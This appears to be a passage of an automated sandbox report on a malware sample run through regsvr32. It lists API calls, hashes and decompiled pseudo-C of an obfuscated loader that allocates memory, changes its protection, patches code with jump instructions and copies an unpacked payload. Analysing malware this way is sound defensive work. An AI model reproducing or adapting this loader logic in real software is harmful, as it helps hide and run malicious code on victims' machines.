Part of subcall function 1000C6C0: UnregisterClassA.USER32(?,00000000), ref: 1000C7C6

memset.MSVCRT ref: 1000CBB8
NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 1000CC22
NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 1000CC3F
NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 1000CC60

Memory Dump Source

Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$ClassCreateLibraryProtectWindowmemset$DestroyFreeLoadRegisterSectionUnregisterWrite
String ID:
API String ID: 317994034-0
Opcode ID: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction ID: ec983c159b6771507b2e65583ae913044cb7e5fe8140f97fdbe63d1be5c924e3
Opcode Fuzzy Hash: e9ba61dee699041d89b454d2aaebe348e1d06309881bf86e54450125777bed9c
Instruction Fuzzy Hash: 1E310C76A00219AFFB01DFA5CD89F9EB7B8EF08790F114165F504D61A4D771EE448B90

Uniqueness

Uniqueness Score: -1.00%

Function 001A2C41, Relevance: 5.1, APIs: 3, Instructions: 582
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction ID: 5507ae4f2530486994ed275ff5080ea4078c6f58f5deea31f6714d97a6099b85
Opcode Fuzzy Hash: 55a69c6a80807367d2ee6713c95060d97be892416f160e53a89ffe9f7bcefe76
Instruction Fuzzy Hash: 6F426B72D00609DFEF04CFA0C9897AA7BB5FF64311F18546AED0DAE149C77815A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 001A3073, Relevance: 4.8, APIs: 3, Instructions: 306
comlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(001A2C25,001A2C25,458F0000,?,00000000), ref: 001A31F1
OleUninitialize.OLE32(001A2C25), ref: 001A3354

Memory Dump Source

Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd

Similarity

API ID: LibraryLoadUninitialize
String ID:
API String ID: 2978721001-0
Opcode ID: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction ID: 4dd41452a046a952763c60044ab2daf1958aed4768b9ebc3df833331e043f03e
Opcode Fuzzy Hash: 63462bf202cfa106886da0fd231bacab201c4396b8d2cbd2302e506409071efd
Instruction Fuzzy Hash: 25D16B72D00615DFEF04CFA0C9897AABBB5FF54311F08546AED49AF149C73816A4CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 001A1424, Relevance: 3.3, APIs: 2, Instructions: 272
memoryCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E001A1424(signed int __ebx, void* __ecx, signed int __edx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t154;
				int _t155;
				signed int _t158;
				int _t159;
				signed int _t160;
				intOrPtr _t163;
				signed int _t164;
				signed int _t166;
				signed int _t169;
				signed int _t171;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t177;
				signed int _t179;
				signed int _t182;
				signed int _t183;
				signed int _t185;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t212;
				signed int _t215;
				signed int _t224;
				signed int _t225;
				void* _t226;
				void* _t227;
				signed int _t234;
				signed int _t237;
				void* _t244;
				signed int* _t246;

				_t234 = __esi;
				_t224 = __edi;
				_t212 = __edx;
				_t155 = E001A463B(_t154, __ebx, __ecx, __edi);
				_push(__ecx);
				_t188 = __ebx | __ebx;
				_t185 = _t188;
				_pop(_t189);
				if(_t188 != 0) {
					if( *(_t185 + 0x4358a4) == 0) {
						_t183 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x435888)), 0xf,  *((intOrPtr*)(_t185 + 0x4353a6)), 0x1c4, 0x800);
						 *_t246 = _t189;
						 *(_t185 + 0x4358a4) = 0 ^ _t183;
						_t189 = 0;
					}
					_push(4);
					_push(0x1000);
					_push( *((intOrPtr*)(_t185 + 0x435280)));
					_push(0);
					if( *(_t185 + 0x435585) == 0) {
						_t182 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x43546a);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) & 0x00000000;
						 *(_t185 + 0x435585) =  *(_t185 + 0x435585) ^ (_t212 & 0x00000000 | _t182);
						_t212 =  *(_t244 - 8);
					}
					_t155 = VirtualAlloc();
				}
				 *_t17 = _t155;
				 *((intOrPtr*)(_t185 + 0x4354d2)) = 2;
				if( *(_t185 + 0x435014) == 0) {
					_t179 =  *((intOrPtr*)(_t185 + 0x441054))(_t185 + 0x435702, _t155);
					 *(_t244 - 4) = _t224;
					 *(_t185 + 0x435014) = 0 ^ _t179;
					_t224 =  *(_t244 - 4);
					_t155 = (_t179 & 0x00000000) +  *_t246;
					_t246 =  &(_t246[1]);
				}
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) & 0x00000000;
				 *(_t185 + 0x4350dc) =  *(_t185 + 0x4350dc) ^ _t234 & 0x00000000 ^ _t155;
				_t237 = _t234;
				if( *(_t185 + 0x4350b0) > 0) {
					if( *((intOrPtr*)(_t185 + 0x43590c)) == 0) {
						_t177 =  *((intOrPtr*)(_t185 + 0x4410a0))(0, 1,  *((intOrPtr*)(_t185 + 0x4351af)),  *((intOrPtr*)(_t185 + 0x435422)), 0x1d7, 0xf8,  *((intOrPtr*)(_t185 + 0x43539e)));
						 *(_t244 - 8) = _t237;
						 *((intOrPtr*)(_t185 + 0x43590c)) = _t177;
						_t237 =  *(_t244 - 8);
					}
					_push(_t185 + 0x4354d2);
					_push(0x40);
					if( *(_t185 + 0x435968) == 0) {
						_t176 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) & 0x00000000;
						 *(_t185 + 0x435968) =  *(_t185 + 0x435968) | _t189 -  *_t246 | _t176;
						_t189 = _t189;
					}
					_t175 =  *((intOrPtr*)(_t185 + 0x441044))(_t185 + 0x43501c, _t185 + 0x4354ea,  *(_t185 + 0x435462));
					 *_t246 = _t189;
					 *((intOrPtr*)(_t185 + 0x4359f1)) = _t175;
					_t189 = 0;
					_t155 = VirtualProtect( *(_t185 + 0x4350b0), ??, ??, ??);
				}
				if(_t155 != _t185) {
					if( *(_t185 + 0x435366) == 0) {
						_t171 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4357ae);
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) & 0x00000000;
						 *(_t185 + 0x435366) =  *(_t185 + 0x435366) ^ _t224 & 0x00000000 ^ _t171;
						_t224 = _t224;
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					_push( *((intOrPtr*)(_t185 + 0x435288)));
					if( *(_t185 + 0x435248) == 0) {
						_t169 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4358c8);
						 *(_t244 - 8) = _t212;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) & 0x00000000;
						 *(_t185 + 0x435248) =  *(_t185 + 0x435248) ^ (_t212 ^  *(_t244 - 8) | _t169);
						_t212 =  *(_t244 - 8);
					}
					_t155 = E001A3726(_t185, _t189, _t212, _t224, _t237); // executed
				}
				 *(_t244 - 4) = _t212;
				_t190 = 0 ^  *(_t185 + 0x435462);
				_t215 =  *(_t244 - 4);
				 *(_t244 - 8) = _t155;
				_t225 = 0 ^  *(_t185 + 0x4350b0);
				_t158 =  *(_t244 - 8);
				if( *((intOrPtr*)(_t185 + 0x4357a2)) == 0) {
					_t158 =  *((intOrPtr*)(_t185 + 0x441060))();
					 *_t79 = _t158;
					_push( *(_t244 - 8));
					_pop( *_t81);
					 *_t82 = _t190;
					_t190 = (_t190 & 0x00000000) +  *(_t244 - 4);
				}
				_t192 = _t225 | _t225;
				_t226 = _t192;
				_t193 = _t190;
				if(_t192 != 0) {
					if( *(_t185 + 0x435520) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
						 *(_t244 - 8) = _t193;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
						_t193 =  *_t246;
						_t246 =  &(_t246[1]);
					}
					_push(_t226);
					if( *(_t185 + 0x4353c6) == 0) {
						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
						_t237 = _t237;
						_t193 = (_t193 & 0x00000000) +  *_t246;
						_t246 = _t246 - 0xfffffffc;
					}
					_t158 = E001A4495(_t158, _t185, _t193, _t215, _t226, _t237);
				}
				 *_t246 =  *_t246 ^ _t158;
				_t159 = _t158;
				if( *(_t185 + 0x435855) == 0) {
					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
					 *(_t244 - 8) = _t226;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
					_t226 =  *(_t244 - 8);
					_pop( *_t113);
					_t193 =  *(_t244 - 8);
					 *_t115 = _t193;
					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
				}
				_t160 = memset(_t226, _t159, _t193 << 0);
				_t227 = _t226 + _t193;
				_t194 = 0;
				if( *(_t185 + 0x4353ce) == 0) {
					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
					 *(_t244 - 4) = _t215;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
					_t215 =  *(_t244 - 4);
				}
				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
					if( *(_t185 + 0x4357d6) == 0) {
						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
						 *(_t244 - 8) = _t237;
						 *(_t185 + 0x4357d6) = 0 ^ _t164;
						_t237 =  *(_t244 - 8);
					}
					_push( *((intOrPtr*)(_t185 + 0x43574e)));
					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
						 *(_t244 - 8) = _t194;
						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
						_t194 =  *(_t244 - 8);
					}
					_t161 = E001A242A(_t185, _t194, _t215, _t227, _t237); // executed
					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
						 *_t146 =  *(_t244 - 4);
					}
					_t160 = E001A3658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
				}
				 *(_t244 - 8) = _t194;
				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
				 *_t153 =  *(_t244 - 4);
				asm("popad");
				return _t160;
			}

0x001a1424
0x001a1424
0x001a1424
0x001a1424
0x001a1429
0x001a142c
0x001a142e
0x001a1430
0x001a1431
0x001a143a
0x001a1458
0x001a1460
0x001a1467
0x001a146d
0x001a146d
0x001a146e
0x001a1470
0x001a1475
0x001a147b
0x001a1484
0x001a148d
0x001a1493
0x001a149b
0x001a14a2
0x001a14a8
0x001a14a8
0x001a14ab
0x001a14ab
0x001a14b2
0x001a14b8
0x001a14c9
0x001a14d3
0x001a14d9
0x001a14e0
0x001a14e6
0x001a14ef
0x001a14f2
0x001a14f2
0x001a14fb
0x001a1502
0x001a1508
0x001a1510
0x001a151d
0x001a153f
0x001a1545
0x001a154c
0x001a1552
0x001a1552
0x001a155b
0x001a155c
0x001a1565
0x001a1567
0x001a1573
0x001a157a
0x001a1580
0x001a1580
0x001a1595
0x001a159d
0x001a15a4
0x001a15aa
0x001a15b1
0x001a15b1
0x001a15b9
0x001a15c2
0x001a15cb
0x001a15d7
0x001a15de
0x001a15e4
0x001a15e4
0x001a15e5
0x001a15eb
0x001a15f8
0x001a1601
0x001a1607
0x001a160f
0x001a1616
0x001a161c
0x001a161c
0x001a161f
0x001a161f
0x001a1624
0x001a162f
0x001a1631
0x001a1634
0x001a163f
0x001a1641
0x001a164b
0x001a164e
0x001a1655
0x001a1658
0x001a165b
0x001a1667
0x001a166a
0x001a166a
0x001a1670
0x001a1672
0x001a1674
0x001a1675
0x001a1682
0x001a16ad
0x001a16b3
0x001a16bb
0x001a16c2
0x001a16cd
0x001a16d0
0x001a16d0
0x001a16d3
0x001a16db
0x001a16de
0x001a16ea
0x001a16f1
0x001a16f7
0x001a16fe
0x001a1701
0x001a1701
0x001a1704
0x001a1704
0x001a170a
0x001a170d
0x001a1715
0x001a171f
0x001a1725
0x001a172d
0x001a1734
0x001a173a
0x001a173d
0x001a1740
0x001a1749
0x001a174c
0x001a174c
0x001a174f
0x001a174f
0x001a174f
0x001a1758
0x001a1761
0x001a1767
0x001a176f
0x001a1776
0x001a177c
0x001a177c
0x001a1785
0x001a178e
0x001a1790
0x001a1796
0x001a179d
0x001a17a3
0x001a17a3
0x001a17a6
0x001a17b3
0x001a17bc
0x001a17c2
0x001a17c9
0x001a17cf
0x001a17cf
0x001a17d2
0x001a17de
0x001a17ef
0x001a17f5
0x001a17f5
0x001a1801
0x001a1801
0x001a1806
0x001a181b
0x001a1821
0x001a1824
0x001a1826

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 001A14AB
VirtualProtect.KERNEL32(?), ref: 001A15B1

Memory Dump Source

Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction ID: f4e9f3735b91120e9e1ed450e84c96c79fdaeabc957f3563868a10ac579f7aa7
Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
Instruction Fuzzy Hash: 55C15D76904604EFFF18CFA0C889B597BB1FF28311F1860A9ED0D9E19AC77415A4CB28

Uniqueness

Uniqueness Score: -1.00%

Function 001A32EB, Relevance: 3.2, APIs: 2, Instructions: 151
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleUninitialize.OLE32(001A2C25), ref: 001A3354
OleInitialize.OLE32(00000000,00000000), ref: 001A349A

Memory Dump Source

Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd

Similarity

API ID: InitializeUninitialize
String ID:
API String ID: 3442037557-0
Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction ID: 7d376cb36cbbcc91f3d53f130d63f9145d048fc75d120624b025f28bf21382c7
Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
Instruction Fuzzy Hash: 18518D72D04619DFEF14CFA4C8897AABBB1FF18311F08556AED49AE189C7341590CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 001A3726, Relevance: 2.2, APIs: 1, Instructions: 735
comCOMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E001A3726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t416;
				signed int _t417;
				signed int _t421;
				void* _t425;
				signed int _t427;
				signed int _t429;
				signed int _t434;
				signed int _t436;
				signed int _t438;
				signed int _t440;
				signed int _t441;
				signed int _t443;
				signed int _t446;
				signed int _t450;
				signed int _t451;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				intOrPtr _t457;
				signed int _t459;
				signed int _t461;
				signed int _t462;
				signed int _t465;
				signed int _t466;
				signed int _t468;
				signed int _t469;
				signed int _t471;
				signed int _t473;
				signed int _t476;
				signed int _t477;
				signed int _t478;
				signed int _t480;
				signed int _t481;
				signed int _t486;
				signed int _t489;
				void* _t493;
				void* _t495;
				signed int _t497;
				signed int _t500;
				void* _t503;
				signed int _t504;
				signed int _t507;
				signed int _t509;
				signed int _t512;
				signed int _t514;
				signed int _t515;
				signed int _t520;
				signed int _t525;
				int _t527;
				int _t531;
				void* _t567;
				signed int _t568;
				signed int _t570;
				signed int _t584;
				signed int _t585;
				signed int _t587;
				void* _t590;
				void* _t592;
				void* _t625;
				intOrPtr* _t626;
				signed int _t627;
				void* _t629;
				signed int _t634;
				signed int _t637;
				signed int _t639;
				void* _t640;
				void* _t641;
				signed int _t657;
				signed int _t660;
				signed int* _t672;
				signed int* _t673;
				signed int* _t676;
				intOrPtr* _t677;
				signed int* _t678;

				_t625 = __esi;
				_t584 = __edi;
				_t567 = __edx;
				_t504 = __ecx;
				_t493 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
					_push(__ebx + 0x4354be);
					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
					_push(_v20);
					_pop( *_t6);
				}
				_t416 = _t493 + 0x435323;
				if( *(_t493 + 0x4351eb) == 0) {
					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
					 *_t672 = _t657;
					 *(_t493 + 0x4351eb) = 0 ^ _t489;
					_t657 = 0;
					_t416 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_push(_t416);
				_t417 = _t493 + 0x43569a;
				if( *(_t493 + 0x4354fd) == 0) {
					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
					_v12 = _t584;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
					_t584 = _v12;
					_t417 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
				_push(_v16);
				_pop( *_t25);
				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
					_push(_v12);
					_pop( *_t31);
				}
				_push(_t625);
				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
					_t481 = _t493 + 0x4353d6;
					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
						_push(_v20);
						_pop( *_t39);
						_t481 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
					_push(_v12);
					_pop( *_t43);
				}
				_push(_t584);
				if( *(_t493 + 0x4356f5) == 0) {
					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
					_t504 = _t504;
				}
				_push(_a4);
				_pop( *_t53);
				_push(_v12);
				_pop(_t626);
				if( *(_t493 + 0x4358dc) == 0) {
					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
					_v16 = _t584;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
					if( *(_t493 + 0x435268) == 0) {
						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
						_t567 = _t567;
						_t477 =  *_t672;
						_t672 =  &(_t672[1]);
					}
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
					_t626 = _t626;
				}
				_v12 = _t504;
				_t585 = 0 ^ _a8;
				_t507 = _v12;
				if( *(_t493 + 0x435675) == 0) {
					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
					_t507 = _t507;
				}
				if( *(_t493 + 0x435732) == 0) {
					if( *(_t493 + 0x435142) == 0) {
						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
						_v16 = _t626;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
						_t626 = _v16;
					}
					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
					_v20 = _t507;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
						_push(_v12);
						_pop( *_t115);
					}
				}
				_push( *((intOrPtr*)(_t626 + 8)));
				if( *(_t493 + 0x435898) == 0) {
					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
					_v12 = _t585;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
					_t585 = _v12;
				}
				_push(_t585);
				if( *(_t493 + 0x4358d8) == 0) {
					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
					 *_t672 = _t567;
					 *(_t493 + 0x4358d8) = 0 ^ _t466;
					_t567 = 0;
				}
				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
					if( *(_t493 + 0x4355f9) == 0) {
						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
						_t585 = _t585;
					}
					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
						_push(_v16);
						_pop( *_t145);
						_t462 =  *_t672;
						_t672 = _t672 - 0xfffffffc;
					}
					 *_t146 = _t462;
					_push(_v16);
					_pop( *_t148);
				}
				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
				_push(_v12);
				_t509 =  &_v20;
				_t660 = _t657;
				_push(_t509);
				if( *(_t493 + 0x4359bd) == 0) {
					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
					_v20 = _t509;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
					_t509 = (_v20 & 0x00000000) +  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				_t627 = _t626 +  *_t626;
				if( *(_t493 + 0x4357f2) == 0) {
					_push(_t509);
					if( *(_t493 + 0x4355bd) == 0) {
						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
						_v16 = _t627;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
						_t627 = _v16;
					}
					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
					_push(0xc);
					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
						 *_t672 = _t627;
						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
						_t627 = 0;
					}
					_push( *((intOrPtr*)(_t493 + 0x435346)));
					if( *(_t493 + 0x435815) == 0) {
						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
						_t627 = _t627;
					}
					_push(0x2e);
					_push( *((intOrPtr*)(_t493 + 0x435a19)));
					if( *(_t493 + 0x435a09) == 0) {
						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
						_v12 = _t509;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
						_t509 = _v12;
					}
					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
					if( *(_t493 + 0x4359dd) == 0) {
						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
						_t509 = _t509;
						_pop( *_t207);
						_t451 = _v12;
					}
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
					_t660 = _t660;
					_t509 =  *_t672;
					_t672 = _t672 - 0xfffffffc;
				}
				do {
					asm("movsb");
					_t509 = _t509 - 1;
				} while (_t509 != 0);
				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
				_t512 = _t509;
				if( *(_t493 + 0x4355d5) == 0) {
					_push(_t493 + 0x435736);
					if( *(_t493 + 0x4352bf) == 0) {
						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
						_t585 = _t585;
					}
					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
					_push(_t585);
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
					if( *(_t493 + 0x435264) == 0) {
						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
						_v12 = _t567;
